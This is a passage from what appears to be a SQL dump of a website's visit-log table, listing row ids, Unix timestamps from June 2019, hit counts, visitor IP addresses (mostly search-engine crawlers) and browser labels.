'),(428097,1560529907,2,2,0,0,'66.249.66.136','chrome'),(428098,1560529970,4,4,0,0,'66.249.66.134','chrome'),(428099,1560529998,1,1,0,0,'66.249.66.64','chrome'),(428100,1560531036,2,2,0,0,'66.249.66.138','chrome'),(428101,1560531213,1,1,0,0,'207.46.13.229','other'),(428102,1560531326,1,1,0,0,'207.46.13.234','other'),(428103,1560531529,1,1,0,0,'66.249.66.68','chrome'),(428104,1560532150,2,2,0,0,'66.249.66.134','chrome'),(428105,1560532653,3,3,0,0,'66.249.66.64','chrome'),(428106,1560532815,1,1,0,0,'207.46.13.229','other'),(428107,1560532822,2,2,0,0,'66.249.66.136','chrome'),(428108,1560532874,1,1,0,0,'66.249.66.138','chrome'),(428109,1560532918,1,1,0,0,'141.8.183.11','other'),(428110,1560533187,1,1,0,0,'207.46.13.234','other'),(428111,1560533855,1,1,0,0,'66.249.66.138','chrome'),(428112,1560533951,2,2,0,0,'66.249.66.136','chrome'),(428113,1560534089,1,1,0,0,'91.209.11.236','other'),(428114,1560534615,1,1,0,0,'207.46.13.229','other'),(428115,1560534769,9,9,0,0,'176.9.9.94','other'),(428116,1560534891,1,1,0,0,'66.249.66.134','chrome'),(428117,1560535269,1,1,0,0,'66.249.66.136','chrome'),(428118,1560535671,3,3,0,0,'176.9.9.94','other'),(428119,1560535962,1,1,0,0,'5.45.207.19','other'),(428120,1560536031,1,1,0,0,'157.55.39.144','other'),(428121,1560536388,2,2,0,0,'66.249.66.136','chrome'),(428122,1560536422,4,4,0,0,'66.249.66.134','chrome'),(428123,1560537853,2,2,0,0,'66.249.66.138','chrome'),(428124,1560538524,1,1,0,0,'141.8.142.108','other'),(428125,1560538534,1,1,0,0,'207.46.13.234','other'),(428126,1560538946,1,1,0,0,'157.55.39.145','other'),(428127,1560539154,1,1,0,0,'180.76.15.18','other'),(428128,1560539617,1,1,0,0,'8.29.198.26','other'),(428129,1560539732,2,2,0,0,'66.249.66.136','chrome'),(428130,1560540231,1,1,0,0,'8.29.198.27','other'),(428131,1560540487,1,1,0,0,'157.55.39.144','other'),(428132,1560541396,1,1,0,0,'66.249.66.138','chrome'),(428133,1560542654,2,2,0,0,'66.249.66.138','chrome'),(428134,1560542873,3,3,0,0,'176.9.9.94','other'),(428135,1560543821,1,1,0,0,'157.55.39.145','other'),(428136,1560544374,1,1,0,0,'207.46.13.234','other'),(428137,1560544464,1,1,0,0,'66.249.66.138','chrome'),(428138,1560544705,1,1,0,0,'66.249.66.68','chrome'),(428139,1560544877,1,1,0,0,'66.249.66.136','chrome'),(428140,1560545525,2,2,0,0,'66.249.66.134','chrome'),(428141,1560546258,1,1,0,0,'66.249.66.138','chrome'),(428142,1560546272,1,1,0,0,'66.249.66.68','chrome'),(428143,1560546791,1,1,0,0,'66.249.66.66','chrome'),(428144,1560546924,1,1,0,0,'66.249.66.136','chrome'),(428145,1560547281,1,1,0,0,'207.46.13.162','other'),(428146,1560547562,1,1,0,0,'178.154.244.11','other'),(428147,1560547638,1,1,0,0,'207.46.13.234','other'),(428148,1560548080,1,1,0,0,'66.249.66.136','chrome'),(428149,1560548220,1,1,0,0,'66.249.66.138','chrome'),(428150,1560548277,1,1,0,0,'207.46.13.56','other'),(428151,1560548512,1,1,0,0,'66.249.66.66','chrome'),(428152,1560548685,1,1,0,0,'66.249.66.64','chrome'),(428153,1560549367,2,2,0,0,'66.249.66.138','chrome'),(428154,1560549377,1,1,0,0,'66.249.66.136','chrome'),(428155,1560549468,1,1,0,0,'207.46.13.234','other'),(428156,1560549508,2,2,0,0,'66.249.66.134','chrome'),(428157,1560549874,1,1,0,0,'66.249.66.68','chrome'),(428158,1560550469,1,1,0,0,'8.29.198.25','other'),(428159,1560550743,1,1,0,0,'207.46.13.143','other'),(428160,1560550888,1,1,0,0,'157.55.39.78','other'),(428161,1560551104,1,1,0,0,'8.29.198.27','other'),(428162,1560551378,1,1,0,0,'5.45.207.79','other'),(428163,1560551503,4,4,0,0,'66.249.66.134','chrome'),(428164,1560551531,2,2,0,0,'66.249.66.136','chrome'),(428165,1560551697,1,1,0,0,'66.249.66.68','chrome'),(428166,1560552130,1,1,0,0,'157.55.39.151','other'),(428167,1560553051,1,1,0,0,'66.249.66.68','chrome'),(428168,1560555020,1,1,0,0,'66.249.66.138','chrome'),(428169,1560555084,1,1,0,0,'66.249.66.134','chrome'),(428170,1560555189,4,4,0,0,'176.9.9.94','other'),(428171,1560555544,1,1,0,0,'157.55.39.78','other'),(428172,1560555795,1,1,0,0,'5.45.207.19','other'),(428173,1560557463,1,1,0,0,'157.55.39.151','other'),(428174,1560559379,1,1,0,0,'157.55.39.220','other'),(428175,1560559612,2,2,0,0,'207.46.13.57','other'),(428176,1560561220,2,2,0,0,'66.249.66.134','chrome'),(428177,1560561320,1,1,0,0,'8.29.198.26','other'),(428178,1560561955,1,1,0,0,'8.29.198.25','other'),(428179,1560562105,1,1,0,0,'157.55.39.57','other'),(428180,1560562193,1,1,0,0,'157.55.39.220','other'),(428181,1560563987,1,1,0,0,'66.249.66.64','chrome'),(428182,1560564307,1,1,0,0,'178.154.244.11','other'),(428183,1560565275,1,1,0,0,'66.249.66.138','chrome'),(428184,1560565332,1,1,0,0,'157.55.39.57','other'),(428185,1560565374,1,1,0,0,'66.249.66.64','chrome'),(428186,1560565556,2,2,0,0,'66.249.66.134','chrome'),(428187,1560566527,1,1,0,0,'42.189.45.51','chrome'),(428188,1560566865,2,2,0,0,'178.154.244.11','other'),(428189,1560567779,1,1,0,0,'66.249.66.64','chrome'),(428190,1560567803,1,1,0,0,'66.249.66.138','chrome'),(428191,1560567935,1,1,0,0,'109.201.152.249','other'),(428192,1560568051,1,1,0,0,'95.108.213.4','other'),(428193,1560568588,1,1,0,0,'157.55.39.57','other'),(428194,1560568904,1,1,0,0,'66.249.69.60','chrome'),(428195,1560568936,1,1,0,0,'40.77.167.207','other'),(428196,1560569039,1,1,0,0,'176.9.9.94','other'),(428197,1560569141,1,1,0,0,'178.154.244.11','other'),(428198,1560569357,3,3,0,0,'66.249.66.134','chrome'),(428199,1560569615,2,2,0,0,'207.46.13.130','other'),(428200,1560570217,1,1,0,0,'207.46.13.243','other'),(428201,1560570237,2,2,0,0,'66.249.66.136','chrome'),(428202,1560570631,1,1,0,0,'66.249.66.66','chrome'),(428203,1560571027,1,1,0,0,'66.249.66.134','chrome'),(428204,1560571031,1,1,0,0,'23.247.81.42','chrome'),(428205,1560571137,1,1,0,0,'207.46.13.130','other'),(428206,1560571327,1,1,0,0,'66.249.66.138','chrome'),(428207,1560571921,1,1,0,0,'40.77.167.97','other'),(428208,1560571959,3,3,0,0,'66.249.66.134','chrome'),(428209,1560572137,2,2,0,0,'66.249.66.136','chrome'),(428210,1560572169,2,2,0,0,'8.29.198.27','other'),(428211,1560573059,2,2,0,0,'66.249.66.136','chrome'),(428212,1560573209,2,2,0,0,'66.249.66.134','chrome'),(428213,1560574414,1,1,0,0,'178.154.244.11','other'),(428214,1560574436,1,1,0,0,'66.249.66.138','chrome'),(428215,1560574568,1,1,0,0,'66.249.66.68','chrome'),(428216,1560574587,2,2,0,0,'66.249.66.136','chrome'),(428217,1560574749,1,1,0,0,'46.211.133.199','chrome'),(428218,1560574812,1,1,0,0,'66.249.66.64','chrome'),(428219,1560574834,1,1,0,0,'66.249.66.66','chrome'),(428220,1560574950,1,1,0,0,'66.249.66.134','chrome'),(428221,1560576390,1,1,0,0,'40.77.167.97','other'),(428222,1560577140,1,1,0,0,'40.77.167.102','other'),(428223,1560577429,1,1,0,0,'178.154.244.11','other'),(428224,1560577510,1,1,0,0,'40.77.167.27','other'),(428225,1560577678,1,1,0,0,'66.249.66.68','chrome'),(428226,1560577703,1,1,0,0,'66.249.66.134','chrome'),(428227,1560577814,2,2,0,0,'66.249.66.64','chrome'),(428228,1560578859,1,1,0,0,'78.102.243.251','other'),(428229,1560579218,1,1,0,0,'66.249.66.68','chrome'),(428230,1560579232,1,1,0,0,'66.249.66.138','chrome'),(428231,1560579260,3,3,0,0,'66.249.66.134','chrome'),(428232,1560579608,1,1,0,0,'91.196.178.30','chrome'),(428233,1560579641,1,1,0,0,'40.77.167.97','other'),(428234,1560579761,1,1,0,0,'66.249.66.136','chrome'),(428235,1560579966,1,1,0,0,'66.249.66.64','chrome'),(428236,1560580216,1,1,0,0,'66.249.66.68','chrome'),(428237,1560580826,2,2,0,0,'66.249.66.136','chrome'),(428238,1560581570,1,1,0,0,'157.55.39.177','other'),(428239,1560581716,1,1,0,0,'5.45.207.79','other'),(428240,1560581744,2,2,0,0,'66.249.66.68','chrome'),(428241,1560581928,3,3,0,0,'66.249.66.134','chrome'),(428242,1560581930,1,1,0,0,'66.249.66.64','chrome'),(428243,1560582100,1,1,0,0,'66.249.66.138','chrome'),(428244,1560582140,2,2,0,0,'207.46.13.191','other'),(428245,1560582600,2,2,0,0,'66.249.66.136','chrome'),(428246,1560583021,1,1,0,0,'8.29.198.25','other'),(428247,1560583355,1,1,0,0,'66.249.66.66','chrome'),(428248,1560583598,2,2,0,0,'66.249.66.136','chrome'),(428249,1560583654,1,1,0,0,'8.29.198.27','other'),(428250,1560583764,2,2,0,0,'66.249.66.134','chrome'),(428251,1560584725,1,1,0,0,'66.249.66.68','chrome'),(428252,1560584816,1,1,0,0,'66.249.66.136','chrome'),(428253,1560584942,1,1,0,0,'66.249.66.134','chrome'),(428254,1560585439,1,1,0,0,'66.249.66.66','chrome'),(428255,1560585470,1,1,0,0,'207.46.13.181','other'),(428256,1560585763,1,1,0,0,'185.234.219.246','chrome'),(428257,1560585996,2,2,0,0,'66.249.66.136','chrome'),(428258,1560586085,1,1,0,0,'66.249.66.134','chrome'),(428259,1560586578,1,1,0,0,'40.77.167.112','other'),(428260,1560586970,1,1,0,0,'13.66.139.0','other'),(428261,1560587365,2,2,0,0,'66.249.66.136','chrome'),(428262,1560587527,2,2,0,0,'66.249.66.138','chrome'),(428263,1560588482,1,1,0,0,'66.249.66.138','chrome'),(428264,1560589206,1,1,0,0,'66.249.66.134','chrome'),(428265,1560589593,1,1,0,0,'77.111.246.192','chrome'),(428266,1560589627,1,1,0,0,'178.154.244.11','other'),(428267,1560590051,2,2,0,0,'66.249.66.138','chrome'),(428268,1560590115,1,1,0,0,'207.46.13.14','other'),(428269,1560590193,1,1,0,0,'66.249.66.64','chrome'),(428270,1560590395,1,1,0,0,'5.45.207.19','other'),(428271,1560591447,1,1,0,0,'66.249.66.64','chrome'),(428272,1560591589,1,1,0,0,'17.58.99.79','other'),(428273,1560591771,2,2,0,0,'40.77.167.112','other'),(428274,1560592371,1,1,0,0,'40.77.167.90','other'),(428275,1560592430,1,1,0,0,'66.249.66.138','chrome'),(428276,1560592549,1,1,0,0,'66.249.66.136','chrome'),(428277,1560592993,1,1,0,0,'40.77.167.88','other'),(428278,1560593488,1,1,0,0,'109.74.154.72','chrome'),(428279,1560593864,1,1,0,0,'8.29.198.27','other'),(428280,1560594151,2,2,0,0,'40.77.167.112','other'),(428281,1560594501,1,1,0,0,'8.29.198.26','other'),(428282,1560595630,2,2,0,0,'77.222.143.222','msie'),(428283,1560595632,2,2,0,0,'66.249.66.136','chrome'),(428284,1560596430,1,1,0,0,'66.249.66.68','chrome'),(428285,1560596574,1,1,0,0,'40.77.167.90','other'),(428286,1560597691,1,1,0,0,'66.249.66.134','chrome'),(428287,1560597925,1,1,0,0,'66.249.66.64','chrome'),(428288,1560598005,5,5,0,0,'66.249.66.136','chrome'),(428289,1560598101,1,1,0,0,'46.96.12.134','chrome'),(428290,1560598629,3,3,0,0,'40.77.167.112','other'),(428291,1560598657,1,1,0,0,'40.77.167.90','other'),(428292,1560599350,1,1,0,0,'178.154.244.11','other'),(428293,1560599737,1,1,0,0,'173.212.233.72','chrome'),(428294,1560599839,2,2,0,0,'40.77.167.112','other'),(428295,1560600034,1,1,0,0,'66.249.66.134','chrome'),(428296,1560600748,1,1,0,0,'91.209.11.236','other'),(428297,1560601376,1,1,0,0,'40.77.167.103','other'),(428298,1560602903,1,1,0,0,'40.77.167.103','other'),(428299,1560602993,1,1,0,0,'157.55.39.157','other'),(428300,1560604264,1,1,0,0,'40.77.167.104','other'),(428301,1560604274,1,1,0,0,'66.249.66.136','chrome'),(428302,1560604312,2,2,0,0,'66.249.66.134','chrome'),(428303,1560604322,1,1,0,0,'66.249.66.66','chrome'),(428304,1560604725,1,1,0,0,'8.29.198.26','other'),(428305,1560605274,2,2,0,0,'66.249.66.136','chrome'),(428306,1560605312,1,1,0,0,'66.249.66.138','chrome'),(428307,1560605339,1,1,0,0,'8.29.198.27','other'),(428308,1560605803,1,1,0,0,'40.77.167.75','other'),(428309,1560605907,1,1,0,0,'157.55.39.157','other'),(428310,1560605951,1,1,0,0,'66.249.66.66','chrome'),(428311,1560606329,2,2,0,0,'66.249.66.134','chrome'),(428312,1560606338,1,1,0,0,'91.196.178.167','chrome'),(428313,1560606346,1,1,0,0,'207.46.13.197','other'),(428314,1560606691,1,1,0,0,'40.77.167.104','other'),(428315,1560606969,2,2,0,0,'66.249.66.136','chrome'),(428316,1560607323,1,1,0,0,'66.249.66.66','chrome'),(428317,1560607472,1,1,0,0,'66.249.66.64','chrome'),(428318,1560607748,1,1,0,0,'5.45.207.79','other'),(428319,1560608755,3,3,0,0,'66.249.66.136','chrome'),(428320,1560608800,2,2,0,0,'207.46.13.197','other'),(428321,1560609199,3,3,0,0,'66.249.66.138','chrome'),(428322,1560609276,3,3,0,0,'66.249.66.134','chrome'),(428323,1560609468,1,1,0,0,'66.249.66.66','chrome'),(428324,1560610423,1,1,0,0,'46.166.190.138','other'),(428325,1560610521,2,2,0,0,'157.55.39.157','other'),(428326,1560611000,1,1,0,0,'40.77.167.10','other'),(428327,1560611510,1,1,0,0,'157.55.39.157','other'),(428328,1560612038,1,1,0,0,'66.249.66.68','chrome'),(428329,1560612048,1,1,0,0,'66.249.66.138','chrome'),(428330,1560612073,4,4,0,0,'66.249.66.136','chrome'),(428331,1560612281,1,1,0,0,'5.45.207.79','other'),(428332,1560612394,1,1,0,0,'66.249.66.64','chrome'),(428333,1560612401,2,2,0,0,'66.249.66.134','chrome'),(428334,1560613145,1,1,0,0,'207.46.13.197','other'),(428335,1560613530,1,1,0,0,'40.77.167.15','other'),(428336,1560614518,1,1,0,0,'87.250.224.65','other'),(428337,1560615155,1,1,0,0,'66.249.66.68','chrome'),(428338,1560615179,2,2,0,0,'66.249.66.64','chrome'),(428339,1560615346,1,1,0,0,'141.8.142.103','other'),(428340,1560615500,1,1,0,0,'66.249.66.136','chrome'),(428341,1560615589,1,1,0,0,'8.29.198.25','other'),(428342,1560615962,1,1,0,0,'157.55.39.151','other'),(428343,1560616172,1,1,0,0,'8.29.198.26','other'),(428344,1560617440,1,1,0,0,'66.249.66.66','chrome'),(428345,1560617468,1,1,0,0,'66.249.66.64','chrome'),(428346,1560618146,1,1,0,0,'40.77.167.10','other'),(428347,1560619395,1,1,0,0,'157.55.39.202','other'),(428348,1560621139,1,1,0,0,'157.55.39.202','other'),(428349,1560621567,2,2,0,0,'178.154.244.11','other'),(428350,1560621769,2,2,0,0,'66.249.66.138','chrome'),(428351,1560621980,1,1,0,0,'40.77.167.86','other'),(428352,1560622835,1,1,0,0,'207.46.13.136','other'),(428353,1560623483,1,1,0,0,'66.249.66.68','chrome'),(428354,1560623514,1,1,0,0,'66.249.66.64','chrome'),(428355,1560623883,1,1,0,0,'66.249.66.134','chrome'),(428356,1560624843,1,1,0,0,'66.249.66.136','chrome'),(428357,1560625440,4,4,0,0,'66.249.66.134','chrome'),(428358,1560625481,1,1,0,0,'157.55.39.201','other'),(428359,1560625899,2,2,0,0,'66.249.66.138','chrome'),(428360,1560625998,4,4,0,0,'66.249.66.136','chrome'),(428361,1560626315,2,2,0,0,'207.46.13.79','other'),(428362,1560626432,1,1,0,0,'37.9.113.148','other'),(428364,1560626434,1,1,0,0,'8.29.198.25','other'),(428365,1560626655,1,1,0,0,'40.77.167.15','other'),(428366,1560627036,1,1,0,0,'8.29.198.26','other'),(428367,1560627533,1,1,0,0,'216.145.5.42','firefox'),(428368,1560629079,2,2,0,0,'95.163.255.99','other'),(428369,1560629183,1,1,0,0,'95.163.255.93','other'),(428370,1560629198,1,1,0,0,'207.46.13.160','other'),(428371,1560629433,1,1,0,0,'66.249.66.134','chrome'),(428372,1560629452,1,1,0,0,'95.163.255.98','other'),(428373,1560629642,1,1,0,0,'95.163.255.96','other'),(428374,1560630250,2,2,0,0,'178.154.244.11','other'),(428375,1560630441,1,1,0,0,'157.55.39.122','other'),(428376,1560630969,1,1,0,0,'66.249.66.134','chrome'),(428377,1560631857,1,1,0,0,'40.77.167.15','other'),(428378,1560632134,1,1,0,0,'157.55.39.102','other'),(428379,1560634760,1,1,0,0,'40.77.167.15','other'),(428380,1560635082,1,1,0,0,'95.163.255.94','other'),(428381,1560635096,1,1,0,0,'91.209.11.236','other'),(428382,1560635201,1,1,0,0,'66.249.66.134','chrome'),(428383,1560635245,1,1,0,0,'95.163.255.98','other'),(428384,1560635290,1,1,0,0,'95.163.255.93','other'),(428385,1560635450,1,1,0,0,'95.163.255.99','other'),(428386,1560635562,1,1,0,0,'95.163.255.96','other'),(428387,1560635565,1,1,0,0,'95.163.255.97','other'),(428388,1560637158,1,1,0,0,'5.45.207.19','other'),(428389,1560637159,1,1,0,0,'5.45.207.79','other'),(428390,1560637279,1,1,0,0,'8.29.198.25','other'),(428391,1560637355,1,1,0,0,'193.106.30.98','chrome'),(428392,1560637547,1,1,0,0,'66.249.66.138','chrome'),(428393,1560637761,1,1,0,0,'141.8.142.103','other'),(428394,1560637884,1,1,0,0,'8.29.198.26','other'),(428395,1560638303,2,2,0,0,'157.55.39.122','other'),(428396,1560638371,1,1,0,0,'95.163.255.99','other'),(428397,1560639454,1,1,0,0,'66.249.66.68','chrome'),(428398,1560640655,1,1,0,0,'46.166.190.142','other'),(428399,1560640657,1,1,0,0,'40.77.167.175','other'),(428400,1560640706,1,1,0,0,'66.249.66.134','chrome'),(428401,1560640958,2,2,0,0,'95.163.255.99','other'),(428402,1560641004,2,2,0,0,'95.163.255.93','other'),(428403,1560641095,2,2,0,0,'95.163.255.92','other'),(428404,1560641146,1,1,0,0,'95.163.255.97','other'),(428405,1560641222,2,2,0,0,'95.163.255.96','other'),(428406,1560642326,1,1,0,0,'66.249.66.134','chrome'),(428407,1560642636,1,1,0,0,'207.46.13.160','other'),(428408,1560644106,1,1,0,0,'207.46.13.160','other'),(428409,1560644445,1,1,0,0,'66.249.66.134','chrome'),(428410,1560644873,2,2,0,0,'66.249.66.136','chrome'),(428411,1560645333,1,1,0,0,'180.76.15.156','other'),(428412,1560645401,1,1,0,0,'207.46.13.56','other'),(428413,1560645428,2,2,0,0,'66.249.66.138','chrome'),(428414,1560645777,1,1,0,0,'95.108.213.4','other'),(428415,1560646678,3,3,0,0,'95.163.255.94','other'),(428416,1560647110,1,1,0,0,'95.163.255.95','other'),(428417,1560647113,1,1,0,0,'95.163.255.96','other'),(428418,1560647304,2,2,0,0,'66.249.66.136','chrome'),(428419,1560647978,2,2,0,0,'66.249.66.134','chrome'),(428420,1560648121,1,1,0,0,'8.29.198.27','other'),(428421,1560648719,1,1,0,0,'8.29.198.26','other'),(428422,1560648741,1,1,0,0,'66.249.66.66','chrome'),(428423,1560648754,2,2,0,0,'66.249.66.136','chrome'),(428424,1560649365,1,1,0,0,'66.249.66.134','chrome'),(428425,1560649617,2,2,0,0,'66.249.66.68','chrome'),(428426,1560649742,1,1,0,0,'23.247.81.42','chrome'),(428427,1560650482,1,1,0,0,'178.154.244.11','other'),(428428,1560651082,2,2,0,0,'66.249.66.134','chrome'),(428429,1560651144,2,2,0,0,'207.46.13.56','other'),(428430,1560652816,1,1,0,0,'95.163.255.97','other'),(428431,1560652821,1,1,0,0,'95.163.255.96','other'),(428432,1560652996,1,1,0,0,'66.249.66.68','chrome'),(428433,1560653139,1,1,0,0,'157.55.39.96','other'),(428434,1560653345,1,1,0,0,'66.249.66.136','chrome'),(428435,1560653390,1,1,0,0,'178.154.171.27','other'),(428436,1560653537,2,2,0,0,'66.249.66.134','chrome'),(428437,1560653873,2,2,0,0,'207.46.13.56','other'),(428438,1560653933,1,1,0,0,'40.77.167.221','other'),(428439,1560654224,1,1,0,0,'66.249.66.66','chrome'),(428440,1560654851,1,1,0,0,'40.77.167.221','other'),(428441,1560655289,1,1,0,0,'207.46.13.42','other'),(428442,1560655296,1,1,0,0,'157.55.39.64','other'),(428443,1560655590,2,2,0,0,'66.249.66.66','chrome'),(428444,1560655727,2,2,0,0,'66.249.66.136','chrome'),(428445,1560655744,1,1,0,0,'207.46.13.56','other'),(428446,1560655800,1,1,0,0,'66.249.66.134','chrome'),(428447,1560656170,2,2,0,0,'5.45.207.19','other'),(428448,1560656979,1,1,0,0,'40.77.167.221','other'),(428449,1560657046,1,1,0,0,'66.249.66.68','chrome'),(428450,1560657252,5,5,0,0,'66.249.66.134','chrome'),(428451,1560657364,89,89,0,0,'88.198.69.233','other'),(428452,1560658062,1,1,0,0,'66.249.66.136','chrome'),(428453,1560658226,1,1,0,0,'66.249.66.134','chrome'),(428454,1560658384,11,11,0,0,'144.76.60.198','other'),(428455,1560658688,1,1,0,0,'91.196.178.131','firefox'),(428456,1560658707,2,2,0,0,'95.163.255.98','other'),(428457,1560658783,2,2,0,0,'95.163.255.92','other'),(428458,1560658801,1,1,0,0,'95.163.255.99','other'),(428459,1560658966,1,1,0,0,'8.29.198.25','other'),(428460,1560659437,1,1,0,0,'207.46.13.56','other'),(428461,1560659550,1,1,0,0,'8.29.198.27','other'),(428462,1560659706,2,2,0,0,'157.55.39.67','other'),(428463,1560660206,1,1,0,0,'77.111.246.243','chrome'),(428464,1560660249,1,1,0,0,'66.249.66.138','chrome'),(428465,1560660823,3,3,0,0,'66.249.66.134','chrome'),(428466,1560661005,1,1,0,0,'66.249.66.136','chrome'),(428467,1560661621,1,1,0,0,'5.45.207.79','other'),(428468,1560661955,1,1,0,0,'207.46.13.56','other'),(428469,1560662277,2,2,0,0,'66.249.66.138','chrome'),(428470,1560662565,2,2,0,0,'66.249.66.136','chrome'),(428471,1560662815,1,1,0,0,'66.249.66.64','chrome'),(428472,1560663555,1,1,0,0,'109.201.138.233','other'),(428473,1560663665,1,1,0,0,'185.100.85.190','other'),(428474,1560663783,2,2,0,0,'66.249.66.136','chrome'),(428475,1560663802,2,2,0,0,'157.55.39.67','other'),(428476,1560663857,1,1,0,0,'66.249.66.68','chrome'),(428477,1560664245,3,3,0,0,'66.249.66.138','chrome'),(428478,1560664297,1,1,0,0,'207.46.13.183','other'),(428479,1560664612,1,1,0,0,'95.163.255.92','other'),(428480,1560664672,1,1,0,0,'95.163.255.97','other'),(428481,1560664713,2,2,0,0,'66.249.66.136','chrome'),(428482,1560664723,1,1,0,0,'95.163.255.95','other'),(428483,1560664741,1,1,0,0,'66.249.66.66','chrome'),(428484,1560664742,1,1,0,0,'95.163.255.94','other'),(428485,1560664843,259,259,0,0,'78.46.63.108','other'),(428486,1560665092,1,1,0,0,'95.163.255.93','other'),(428487,1560665443,1,1,0,0,'207.46.13.178','other'),(428488,1560666340,1,1,0,0,'173.212.233.72','chrome'),(428489,1560666897,1,1,0,0,'46.211.103.106','chrome'),(428490,1560667252,1,1,0,0,'66.249.66.136','chrome'),(428491,1560667300,5,5,0,0,'66.249.66.134','chrome'),(428492,1560667589,1,1,0,0,'46.211.66.50','chrome'),(428493,1560667951,2,2,0,0,'207.46.13.178','other'),(428494,1560668412,4,4,0,0,'66.249.66.138','chrome'),(428495,1560668426,2,2,0,0,'66.249.66.136','chrome'),(428496,1560668615,1,1,0,0,'66.249.66.68','chrome'),(428497,1560668808,2,2,0,0,'66.249.66.134','chrome'),(428498,1560668862,1,1,0,0,'157.55.39.67','other'),(428499,1560668925,1,1,0,0,'212.92.112.51','firefox'),(428500,1560669196,1,1,0,0,'180.76.15.12','other'),(428501,1560669213,1,1,0,0,'66.249.66.66','chrome'),(428502,1560669439,1,1,0,0,'207.180.241.15','other'),(428503,1560669550,2,2,0,0,'192.151.145.178','other'),(428504,1560669754,1,1,0,0,'178.255.215.94','other'),(428505,1560669815,1,1,0,0,'8.29.198.25','other'),(428506,1560669937,2,2,0,0,'66.249.66.136','chrome'),(428507,1560670123,1,1,0,0,'23.247.81.42','chrome'),(428508,1560670401,1,1,0,0,'8.29.198.26','other'),(428509,1560670425,1,1,0,0,'178.154.244.11','other'),(428510,1560670503,1,1,0,0,'95.163.255.98','other'),(428511,1560670539,3,3,0,0,'157.55.39.77','other'),(428512,1560670670,2,2,0,0,'95.163.255.92','other'),(428513,1560670673,1,1,0,0,'95.163.255.99','other'),(428514,1560671687,2,2,0,0,'66.249.66.134','chrome'),(428515,1560671782,1,1,0,0,'5.45.207.19','other'),(428516,1560672296,3,3,0,0,'66.249.66.138','chrome'),(428517,1560672664,3,3,0,0,'157.55.39.153','other'),(428518,1560673301,4,4,0,0,'95.216.16.51','other'),(428519,1560673956,1,1,0,0,'66.249.66.66','chrome'),(428520,1560674626,1,1,0,0,'157.55.39.67','other'),(428521,1560674655,2,2,0,0,'66.249.66.138','chrome'),(428522,1560675391,1,1,0,0,'66.249.66.136','chrome'),(428523,1560675768,2,2,0,0,'66.249.66.138','chrome'),(428524,1560675793,2,2,0,0,'157.55.39.153','other'),(428525,1560676378,2,2,0,0,'95.163.255.99','other'),(428526,1560676379,2,2,0,0,'66.249.66.64','chrome'),(428527,1560677068,1,1,0,0,'95.163.255.97','other'),(428528,1560677902,3,3,0,0,'66.249.66.138','chrome'),(428529,1560678411,1,1,0,0,'66.249.66.134','chrome'),(428530,1560678508,1,1,0,0,'141.8.142.103','other'),(428531,1560679324,1,1,0,0,'109.74.154.72','chrome'),(428532,1560679333,1,1,0,0,'95.163.255.93','other'),(428533,1560679775,1,1,0,0,'66.249.66.138','chrome'),(428534,1560679902,1,1,0,0,'66.249.66.136','chrome'),(428535,1560680587,1,1,0,0,'66.249.66.68','chrome'),(428536,1560680681,1,1,0,0,'8.29.198.26','other'),(428537,1560681004,1,1,0,0,'157.55.39.77','other'),(428538,1560681033,1,1,0,0,'213.180.203.40','other'),(428539,1560681244,1,1,0,0,'8.29.198.25','other'),(428540,1560681409,1,1,0,0,'66.249.66.136','chrome'),(428541,1560681609,1,1,0,0,'66.249.66.68','chrome'),(428542,1560682028,1,1,0,0,'95.163.255.92','other'),(428543,1560682246,2,2,0,0,'95.163.255.98','other'),(428544,1560682249,1,1,0,0,'95.163.255.96','other'),(428545,1560682340,1,1,0,0,'95.163.255.99','other'),(428546,1560682353,1,1,0,0,'95.163.255.94','other'),(428547,1560682645,2,2,0,0,'66.249.66.136','chrome'),(428548,1560682743,2,2,0,0,'66.249.66.138','chrome'),(428549,1560683190,1,1,0,0,'178.255.215.94','other'),(428550,1560683222,1,1,0,0,'207.46.13.143','other'),(428551,1560683839,1,1,0,0,'157.55.39.67','other'),(428552,1560683914,1,1,0,0,'180.76.15.19','other'),(428553,1560684335,4,4,0,0,'66.249.66.138','chrome'),(428554,1560684747,1,1,0,0,'66.249.66.64','chrome'),(428555,1560685127,2,2,0,0,'66.249.66.134','chrome'),(428556,1560685181,1,1,0,0,'66.249.66.66','chrome'),(428557,1560685288,1,1,0,0,'66.249.66.136','chrome'),(428558,1560685291,1,0,1,0,'66.249.66.138',''),(428559,1560685735,1,1,0,0,'157.55.39.67','other'),(428560,1560686659,1,1,0,0,'37.73.196.181','chrome'),(428561,1560687020,1,1,0,0,'66.249.66.66','chrome'),(428562,1560687595,1,1,0,0,'207.46.13.137','other'),(428563,1560687795,1,1,0,0,'157.55.39.203','other'),(428564,1560688066,2,2,0,0,'95.163.255.99','other'),(428565,1560688085,1,1,0,0,'95.163.255.93','other'),(428566,1560688087,1,1,0,0,'95.163.255.97','other'),(428567,1560688195,1,1,0,0,'95.163.255.95','other'),(428568,1560688401,1,1,0,0,'157.55.39.119','other'),(428569,1560688405,1,1,0,0,'157.55.39.120','other'),(428570,1560688577,2,2,0,0,'95.163.255.98','other'),(428571,1560688601,1,1,0,0,'95.163.255.96','other'),(428572,1560688804,1,1,0,0,'95.163.255.92','other'),(428573,1560689052,2,2,0,0,'66.249.66.136','chrome'),(428574,1560689845,1,1,0,0,'66.249.66.138','chrome'),(428575,1560690366,1,1,0,0,'66.249.66.66','chrome'),(428576,1560691021,1,1,0,0,'207.46.13.137','other'),(428577,1560691543,1,1,0,0,'8.29.198.26','other'),(428578,1560691880,1,1,0,0,'66.249.66.136','chrome'),(428579,1560691979,1,1,0,0,'66.249.66.66','chrome'),(428580,1560692009,1,1,0,0,'207.46.13.137','other'),(428581,1560692079,1,1,0,0,'8.29.198.27','other'),(428582,1560692143,1,1,0,0,'66.249.66.134','chrome'),(428583,1560692318,1,1,0,0,'66.249.66.138','chrome'),(428584,1560692595,1,1,0,0,'5.45.207.19','other'),(428585,1560692986,1,1,0,0,'157.55.39.120','other'),(428586,1560693552,1,1,0,0,'66.249.66.136','chrome'),(428587,1560693959,1,1,0,0,'95.163.255.92','other'),(428588,1560694043,1,1,0,0,'95.163.255.99','other'),(428589,1560694044,1,1,0,0,'95.163.255.93','other'),(428590,1560694457,1,1,0,0,'5.45.207.79','other'),(428591,1560694804,1,1,0,0,'157.55.39.119','other'),(428592,1560695771,1,1,0,0,'157.55.39.120','other'),(428593,1560696148,1,1,0,0,'157.55.39.119','other'),(428594,1560696244,1,1,0,0,'66.249.66.136','chrome'),(428595,1560696357,1,1,0,0,'5.45.207.76','other'),(428596,1560696373,1,1,0,0,'178.154.244.49','other'),(428597,1560696467,8,8,0,0,'144.76.3.131','other'),(428598,1560696530,1,1,0,0,'91.196.178.68','fir